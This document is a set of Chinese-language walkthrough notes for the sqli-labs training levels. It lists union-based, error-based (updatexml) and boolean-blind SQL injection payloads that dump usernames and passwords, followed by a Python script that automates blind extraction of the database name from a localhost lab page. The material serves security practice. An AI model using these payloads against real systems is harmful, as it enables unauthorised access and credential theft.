第一关
字符型注入
二分法猜字段
?id=1' order by 10;--+
?id=1' order by 3;--+
联合查询
?id=-1' union select 1,user(),database();--+
?id=-1' union select 1,2,group_concat(id,username,password) from users; --+
第五关
报错注入
?id=1' and updatexml(1,concat('~',(select user()),'~'),1)--+
?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
分段查询(substr)
1-32字节
?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20substr(group_concat(username,0x3a,password),1,32)from%20users),0x7e),1)--+
32-64字节
?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20substr(group_concat(username,0x3a,password),32,64)from%20users),0x7e),1)--+
64-96字节
96-128字节
第八关
?id=1'
页面为真时显示You are in......... 页面为假时不显示
利用ASCII码查找
?id=1' and ascii(substr(database(),1,1))>100--+
?id=1' and ascii(substr(database(),1,1))>110--+
?id=1' and ascii(substr(database(),1,1))>120--+
?id=1' and ascii(substr(database(),1,1))>114--+
?id=1' and ascii(substr(database(),1,1))=115--+
第一行第一个字符ASCII=115(字母s)时为真，依此类推
python脚本
import requests
# Target of the blind-injection probe below: the local sqli-labs Less-8 page.
url = "http://127.0.0.1/sqli/Less-8/index.php"
def inject_database(url):
    """Recover the current database name one character at a time from the Less-8 lab page.

    Boolean-based blind probe: for each position 1..19 the page is asked whether
    ``ascii(substr(database(), pos, 1))`` equals each code 32..128, and the presence
    of the marker string in the response body is taken as "true". Every recovered
    character is printed as soon as it is found; the function returns ``None``.
    A position for which no code matches is simply skipped (the loop moves on).

    Parameters:
        url: address of the lab's index.php (the caller passes the module-level ``url``).

    Side effects:
        Issues up to 19 * 97 GET requests to ``url`` (no timeout is set, so a
        stalled server blocks the loop) and prints the partial name after each hit.

    Detection note: server-side this is a burst of requests whose ``id`` parameter
    carries the same ``ascii(substr(database()...`` text with only two integers
    changing between requests -- an easy signature for log review or WAF rules.
    """
    marker = "You are in..........."
    recovered = ""
    for position in range(1, 20):
        for code in range(32, 129):
            probe = f"1' and ascii(substr(database(), {position}, 1)) = {code}-- "
            response = requests.get(url, params={"id": probe})
            # The first code that makes the page show the marker is the character
            # at this position; stop scanning codes and go to the next position.
            if marker in response.text:
                recovered += chr(code)
                print(recovered)
                break
# Top-level call: the probe runs as soon as this file is executed (or imported).
inject_database(url)